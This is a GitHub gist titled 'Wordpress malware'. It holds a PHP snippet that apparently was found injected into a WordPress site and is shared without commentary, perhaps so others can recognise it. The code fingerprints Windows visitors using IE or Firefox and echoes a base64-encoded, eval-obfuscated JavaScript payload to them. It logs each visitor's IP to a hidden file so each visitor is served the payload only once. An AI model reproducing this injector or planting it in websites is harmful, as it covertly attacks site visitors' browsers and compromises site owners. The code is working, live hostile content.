Skip to content

Instantly share code, notes, and snippets.

@arnklint
Created July 13, 2012 13:37
Show Gist options
  • Save arnklint/3104923 to your computer and use it in GitHub Desktop.
Save arnklint/3104923 to your computer and use it in GitHub Desktop.
Wordpress malware
$ip=$_SERVER["REMOTE_ADDR"];$dr=$_SERVER["DOCUMENT_ROOT"];$ua = $_SERVER['HTTP_USER_AGENT'];$dbf=$dr.'/'.md5($dr);
if((strpos($ua,'Windows')!==false)&&((strpos($ua,'MSIE')!==false)||(strpos($ua,'Firefox')!==false))&&(strpos(@file_get_contents($dbf),$ip) === false)){
error_reporting(0);
echo(base64_decode('PHNjcmlwdD50cnl7cHJvdG90eXBlJTI7fWNhdGNoKGFzZCl7eD0yO30gaT0yLTI7dHJ5e3Byb3RvdHlwZSo1O31jYXRjaCh6KXtmcj0iZnJvbUNoYXIiO2Y9WzcyLDgxLDg0MCw5MTgsMjU2LDM2MCw4MDAsOTk5LDc5MiwxMDUzLDg3Miw5MDksODgwLDEwNDQsMzY4LDkyNyw4MDgsMTA0NCw1NTIsOTcyLDgwOCw5ODEsODA4LDk5MCw5MjgsMTAzNSw1MjgsMTA4OSw2NzIsODczLDgyNCw3MDIsNzc2LDk4MSw4MDgsMzYwLDMxMiw4ODIsODg4LDkwMCw5NjgsMzUxLDMyOCw4MTksMzg0LDgzNywzMjgsMTEwNywxMDQsODEsNzIsODEsODQwLDkxOCw5MTIsODczLDg3Miw5MDksOTEyLDM2MCwzMjgsNTMxLDEwNCw4MSw3MiwxMTI1LDI1Niw5MDksODY0LDEwMzUsODA4LDI4OCw5ODQsMTE3LDcyLDgxLDcyLDkwMCw4ODgsODkxLDkzNiw5ODEsODA4LDk5MCw5MjgsNDE0LDk1MiwxMDI2LDg0MCwxMDQ0LDgwOCwzNjAsMjcyLDU0MCw4NDAsOTE4LDkxMiw4NzMsODcyLDkwOSwyNTYsMTAzNSw5MTIsODkxLDQ4OCwzNTEsODMyLDEwNDQsOTI4LDEwMDgsNDY0LDQyMywzNzYsOTU0LDk2MCwxMDk4LDg0MCw5MjcsODMyLDkxOCw5MjAsOTk5LDc3Niw0MTQsODU2LDEwNzEsODQwLDk2MywzNjgsMTA0NCw4ODgsNDIzLDUwNCw5MjcsODg4LDU0OSw0MDAsMzUxLDI1NiwxMDcxLDg0MCw5MDAsOTI4LDkzNiw0ODgsMzUxLDM5Miw0MzIsMzEyLDI4OCw4MzIsOTA5LDg0MCw5MjcsODMyLDEwNDQsNDg4LDM1MSwzOTIsNDMyLDMxMiwyODgsOTIwLDEwNDQsOTY4LDk3Miw4MDgsNTQ5LDMxMiwxMDYyLDg0MCwxMDM1LDg0MCw4ODIsODQwLDk3Miw4NDAsMTA0NCw5NjgsNTIyLDgzMiw5NDUsODAwLDkwMCw4MDgsOTkwLDQ3MiwxMDA4LDg4OCwxMDM1LDg0MCwxMDQ0LDg0MCw5OTksODgwLDUyMiw3NzYsODgyLDkyMCw5OTksODY0LDEwNTMsOTI4LDkwOSw0NzIsOTcyLDgwOCw5MTgsOTI4LDUyMiwzODQsNTMxLDkyOCw5OTksODk2LDUyMiwzODQsNTMxLDMxMiw1NTgsNDgwLDQyMyw4NDAsOTE4LDkxMiw4NzMsODcyLDkwOSw0OTYsMzA2LDMyOCw1MzEsMTA0LDgxLDcyLDExMjUsMTA0LDgxLDcyLDkxOCw5MzYsOTkwLDc5MiwxMDQ0LDg0MCw5OTksODgwLDI4OCw4NDAsOTE4LDkxMiw4NzMsODcyLDkwOSw5MTIsMzYwLDMyOCwxMTA3LDEwNCw4MSw3Miw4MSw5NDQsODczLDkxMiwyODgsODE2LDI4OCw0ODgsMjg4LDgwMCw5OTksNzkyLDEwNTMsODcyLDkwOSw4ODAsMTA0NCwzNjgsODkxLDkxMiw5MDksNzc2LDEwNDQsODA4LDYyMSw4NjQsOTA5LDg3Miw5MDksODgwLDEwNDQsMzIwLDM1MSw4NDAsOTE4LDkxMiw4NzMsODcyLDkwOSwzMTIsMzY5LDQ3Miw5MTgsMzY4LDEwMzUsODA4LDEwNDQsNTIwLDEwNDQsOTI4LDEwMjYsODQwLDg4Miw5MzYsMTA0NCw4MDgsMzYwLDMxMiwxMDM1LDkxMiw4OTEsMzEyLDM5NiwzMTIsOTM2LDkyOCwxMDQ0LDg5Niw1MjIsMzc2LDQyMyw4NDgsMTA4MCw5NzYsOTQ1LDgyNCw5MzYsODE2LDEwMzUsODg4LDg3MywzNjgsOTYzLDk1Miw5NDUsODU2LDQxNCw5MjgsOTk5LDM3Niw1NjcsODI0LDk5OSw0ODgsNDUwLDMxMiwzNjksNDcyLDkxOCwzNjgsMTAzNSw5MjgsMTA4OSw4NjQsOTA5LDM2OCwxMDYyLDg0MCwxMDM1LDg0MCw4ODIsODQwLDk3Miw4NDAsMTA0NCw5NjgsNTQ5LDMxMiw5MzYsODQwLDkwMCw4MDAsOTA5LDg4MCwzNTEsNDcyLDkxOCwzNjgsMTAzNSw5MjgsMTA4OSw4NjQsOTA5LDM2OCwxMDA4LDg4OCwxMDM1LDg0MCwxMDQ0LDg0MCw5OTksODgwLDU0OSwzMTIsODczLDc4NCwxMDM1LDg4OCw5NzIsOTM2LDEwNDQsODA4LDM1MSw0NzIsOTE4LDM2OCwxMDM1LDkyOCwxMDg5LDg2NCw5MDksMzY4LDk3Miw4MDgsOTE4LDkyOCw1NDksMzEyLDQzMiwzMTIsNTMxLDgxNiw0MTQsOTIwLDEwNDQsOTY4LDk3Miw4MDgsNDE0LDkyOCw5OTksODk2LDU0OSwzMTIsNDMyLDMxMiw1MzEsODE2LDQxNCw5MjAsOTA5LDkyOCw1ODUsOTI4LDEwNDQsOTEyLDk0NSw3ODQsMTA1Myw5MjgsOTA5LDMyMCwzNTEsOTUyLDk0NSw4MDAsMTA0NCw4MzIsMzUxLDM1MiwzNTEsMzkyLDQzMiwzMTIsMzY5LDQ3Miw5MTgsMzY4LDEwMzUsODA4LDEwNDQsNTIwLDEwNDQsOTI4LDEwMjYsODQwLDg4Miw5MzYsMTA0NCw4MDgsMzYwLDMxMiw5MzYsODA4LDk0NSw4MjQsOTM2LDkyOCwzNTEsMzUyLDM1MSwzOTIsNDMyLDMxMiwzNjksNDcyLDExNyw3Miw4MSw3Miw5MDAsODg4LDg5MSw5MzYsOTgxLDgwOCw5OTAsOTI4LDQxNCw4MjQsOTA5LDkyOCw2MjEsODY0LDkwOSw4NzIsOTA5LDg4MCwxMDQ0LDkyMCw1OTQsOTY4LDc1Niw3NzYsOTI3LDYyNCw4NzMsODcyLDkwOSwzMjAsMzUxLDc4NCw5OTksODAwLDEwODksMzEyLDM2OSw3MjgsNDMyLDc0NCw0MTQsNzc2LDEwMDgsODk2LDkwOSw4ODAsOTAwLDUzNiw5MzYsODQwLDk3Miw4MDAsMzYwLDgxNiwzNjksNDcyLDExNyw3Miw4MSwxMDAwXTt2PSJldmEiO31pZih2KWU9d2luZG93W3YrImwiXTt3PWY7cz1bXTtyPVN0cmluZzt6PSgoZSk/IkNvZGUiOiIiKTtmb3IoOzU3MS01KzU+aTtpKz0xKXtqPWk7aWYoZSlzPXMrcltmcisoKGUpPyJDb2RlIjoxMildKCh3W2pdLyg4K2UoImolMiIpKSkpO30gdHJ5e2FlYWRlMjc4OGE2ZmVjZmNiY2YzMWQ4ZTgwNTQ2MDYxMCgpO31jYXRjaChxKXtpZihmKWUocyk7fTwvc2NyaXB0Pg=='));
if ($fp = @fopen($dbf , "a")){fputs($fp , $ip.'|'); fclose($fp);}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment